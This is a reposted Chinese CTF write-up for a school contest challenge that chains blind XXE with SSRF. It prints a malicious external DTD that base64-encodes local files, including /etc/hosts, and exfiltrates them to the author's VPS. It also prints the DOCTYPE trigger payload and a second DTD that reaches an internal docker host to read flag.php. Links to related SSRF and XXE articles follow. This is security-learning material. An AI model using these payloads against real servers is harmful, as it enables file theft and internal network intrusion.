一道XXE和SSRF的题目

最新推荐文章于 2024-06-04 00:20:32 发布
转载 最新推荐文章于 2024-06-04 00:20:32 发布 · 527 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://juejin.im/post/5b2c850de51d45589e7bd05b
文章标签:

#php #javascript #运维 #ViewUI

本文介绍了一道结合XML外部实体(XXE)漏洞与服务器侧请求伪造(SSRF)的安全挑战题目。通过利用XXE漏洞无回显的特点,作者详细记录了解题过程,包括如何设置恶意DTD文件读取服务器敏感信息,并进一步利用SSRF探测内网获取FLAG。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

title: 一道XXE漏洞和SSRF结合的题目 date: 2018-01-14 16:47:59 tags: [writeup,ctf]

学校在考试周,ennnn.....搞了校赛 遇到了一道xxe和ssrf结合的题目,感觉挺不错的,简单记录一下

这里只记录下流程,具体的原理这里有几个链接(当时也是复习了一遍 前辈们比我写得好

未知攻焉知防——XXE漏洞攻防 XXE漏洞的简单理解和测试

打开题目很清楚就是xxe且无回显,接下来就直接写题解了 首先vps放文件file.dtd,内容如下:

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'>">
复制代码

漏洞处payload

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://我的VPS地址/file.dtd">%remote;%int;%trick;]>
复制代码

查看服务器log(nginx一般在var/log/nginx/access.log)

base64解码

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.17.0.6	flag 5e8af79b12ae xxessrf_flag_1
172.17.0.6	flag_1 5e8af79b12ae xxessrf_flag_1
172.17.0.6	xxessrf_flag_1 5e8af79b12ae
172.17.0.7	74791d7ac29b
复制代码

嗯????还有一层???接着继续读下index

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	 
	<title>XML</title>
	<link rel="stylesheet" href="./bootstrap.min.css">  
	<script src="./jquery.min.js"></script>
	<script src="./bootstrap.min.js"></script>
</head>
<body>

<form role="form" id="form" method="POST" action="index.php">
	<div class="form-group">
		<label for="name">XML</label>
		<textarea class="form-control" rows="6" name="data" placeholder="
<code>
	<body>Hello World!</body>
</code> 
"></textarea>
	</div>
  <div class="btn-group">
    <button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()">SUBMIT</button>
  </div>
  <?php
  	error_reporting(0);
	include("flag.php");
	if(isset($_POST['data']) and $_POST['data'] != "") {
		$xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
	}
	?>
  </form>
复制代码

哦??圈住include("flag.php"),尝试直接读,没反应,想着也应该,还有提示SSRF 至此,上午工作基本结束,剩下持续发呆直到下午...... xxessrf???开始探测内网端口....从8080.....到2018..... 嗯中途放弃了.....最后又拿了起来,在队友群又发一下hosts截图

你那个172.17.0.7是啥?

.......docker,内网 读取flag

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.6/?file=php://filter/read=convert.base64-encode/resource=flag.php">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'>">
复制代码
UEQ5d2FIQWdDaTh2WldOb2J5QWlZM1Z0ZEdOMFpudENNV2x1TTE5NGVETmZZVzVrWDNOemNtWmZNWE5mUTI5dmJEOTlJanNLUHo0S0NnPT0=

...

<?php 
//echo "cumtctf{B1in3_xx3_and_ssrf_1s_Cool?}";
?>
复制代码

好久没做题了,脑子有点不好使......

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-4)SSRF相关面试题
qq_51577576的博客
11-29 1814
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-4)SSRF相关面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞SSRF方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是网安岗位相契合的。
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 5108
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
SSRF及相关例题
2302_80044238的博客
06-04 1010
服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
ssrf漏洞与xxe漏洞,简单理解
qq_54030686的博客
11-27 2179
ssrf漏洞(简单理解)服务端请求伪造 产生原因:服务端加载其他网站的文件进行利用,而其他网站路径可以进行修改导致的漏洞利用 经常出现的位置:图片的加载,文件读取,网页转码等; 标志:url=http://127.0.0.1/1.jpg 利用手段:可以进行内网的端口探测,读取文件等, 防御方法:验证返回值,统一报错信息 详情见:https://blog.youkuaiyun.com/qq_30135181/article/details/52734225 xxe漏洞(简单理解)外部实体化注入 简单的说,类似于命令注入,
SSRF题目复现
qq_40909772的博客
11-19 2829
1. [HITCON 2017] SSRFme。 题目平台地址:https://buuoj.cn/challenges 进入题目环境之后是代码审计,代码如下: 59.49.169.109 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_AD
SSRF题目进阶+SSRF正则绕过+进制绕过SSRF限制
疯狂小伟哥的博客
04-16 871
11、根据上述结果显示,可以初步判断,允许使用http或者https协议,但是不允许使用localhost,尝试使用127.0.0.1访问。6、根据返回结果可以判断出,当在输入框内输入网站地址,服务端会尝试访问该地址,并返回响应内容。6、返回结果为html实体编码,将返回结果复制,并保存在.html后缀的文件当中。10、访问/upload/123xxx.phpphpinfo函数已执行。3、扫描到文件flag.php,访问flag.php文件。3、扫描到文件flag.php,访问flag.php文件。
xxe-xml外部实体注入
nigo134的博客
07-27 3176
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
【网络安全】什么是XXE?从0到1完全掌握XXE
HBohan的博客
04-28 5493
前置知识 XML 定义实体 XML 实体允许定义在分析 XML 文档时将由内容替换的标记,这里我的理解就是定义变量,然后赋值的意思一致。就比如一些文件上传的 payload 中就会有。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 <?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT messa
渗透测试之xxe外部实体注入
weixin_45380284的博客
03-06 833
xxe(XML外部实体注入) 参考地址:https://xz.aliyun.com/t/3357 理论: XXE漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害 防御: 手动黑名单过滤(不推荐) 过滤关键词:<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞
web基本解题思路
Ljt101222的博客
07-19 3914
前两天安装一些web相关的软件,今天主要是做一些简单的web基础题。主要用BurpSuite软件进行抓包分析数据,其中涉及到一些方法,如下所示:   一、爆破,包括包括md5、爆破随机数、验证码识别等 二、绕WAF,包括花式绕Mysql、绕文件读取关键词检测之类拦截 三、花式玩弄几个PHP特性,包括弱类型,strpos===,反序列化 destruct、\0截断、iconv截断、 四、密码...
SSRF专题
goddemon
12-12 797
①内网伪造 如 即伪造访问内网的flag.php内容状况类 http://challenge-0b0cb1735e1d9316.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php ②利用文件读取类 即利用file://协议读取思路 ?url=file:///var/www/html/flag.php
网络安全:SSRF+XXE漏洞挖掘笔记
A_991128a的博客
02-12 714
本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果该实验室具有库存检查功能,可从内部系统获取数据。为了解决实验室,更改股票检查 URL 以访问管理界面并删除用户。1.浏览/admin并观察您无法直接访问管理页面。2.访问一个产品,点击“Check stock”,拦截Burp Suite中的请求,发送给Burp Repeater。3.将stockApi参数中的 URL 更改为http://localhost/admin. 这应该显示管理界面。4.阅读 HTML 确
SSRF(服务器端请求伪造)的学习以及相关例题(上)
2401_82388450的博客
05-13 1209
SSRF(服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
SSRFXXE 攻击原理及利用
m0_51581045的博客
12-04 1919
SSRFXXE 攻击原理及利用SSRFXXE*SSRF详解1.思维导图:2.基本原理1. 什么是SSRF?2. SSRF的成因:3. SSRF的作用:4. 漏洞常见形式:5.验证方法:3.漏洞攻击4. SSRF过滤绕过方法5. 防御方法*XXE详解1.概念2.危害3.检测• 白盒• 黑盒4.利用5.一些payload6.防御与修复 SSRFXXE *SSRF详解 1.思维导图: 2.基本原理 1. 什么是SSRFSSRF:服务器请求伪造,是一种由攻击者构造,通过服务端发起请求的安全漏
以题为例浅谈SSRF(1),实战案例
2301_79099473的博客
04-11 821
??phpif (!url=_");exit;```flag.php源码```phpreturn;echo $flag;exit;???payload =“”"“”"#注意后面一定要有回车,回车结尾表示http请求结束print(result) # 这里因为是GET请求所以要进行两次url编码。
以点到面的SSRF漏洞入门学习+安鸾渗透测试靶场SSRF系列题目练习 SSRF01 SSRF02 SSRF03
AAAAAAAAAAAA66的博客
02-03 2030
目录 认识 SSRF(服务器伪造) 实例 安鸾SSRF01 有时间的话可以先看看这里 前言:其实我很早就了解到了'SSRF' (服务器伪造)这个名词了,但是当时仅从字面上感觉非常难理解,看了下详细的描述也没有什么头绪,再加上没有碰到什么靶场或者CTF题目有把这个作为单独的考点,到了最后可能就放弃了对SSRF的学习。 所以这里最好从一些简单的靶场练习,帮助我们建立一点印象,再以点到面的学习,然后逐渐的掌握各种相关应用场景。大家耐心的看一遍话基本能简单的入门SSRF了。 这是我一个新手的一.
深入了解ssrf(实践练习)上
qq_62046696的博客
07-04 971
ctfhub直接访问127.0.0.1/flag.php即可 伪协议:事实上是其支持的协议与封装协议。而其支持的部分协议有: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams)查看源码即可 3.端口扫描(burp爆破)进去以后send to intruder 然后GET /?url=127.0.0.1:§8
nssctf之SSRF刷题记录
夜未至
06-23 1013
file_get_contents — 将整个文件读入一个字符串。
CTFHub-Web-SSRF练习
Atkx's Blog
10-18 6979
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议 内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 访问靶机地址,发现url后面多了/?url=_ 然后访问127.0.0.1/flag.php Payload: ?url=127.0.0.1/flag.php 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。 Payload
xxe ssrf
最新发布
03-29
### XXE SSRF 漏洞原理 #### XML 外部实体 (XXE) 漏洞 XML外部实体注入(XXE)是一种利用应用程序解析XML输入时未正确限制外部实体的能力来执行恶意操作的安全漏洞。当应用程序允许用户提交自定义XML文档并将其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值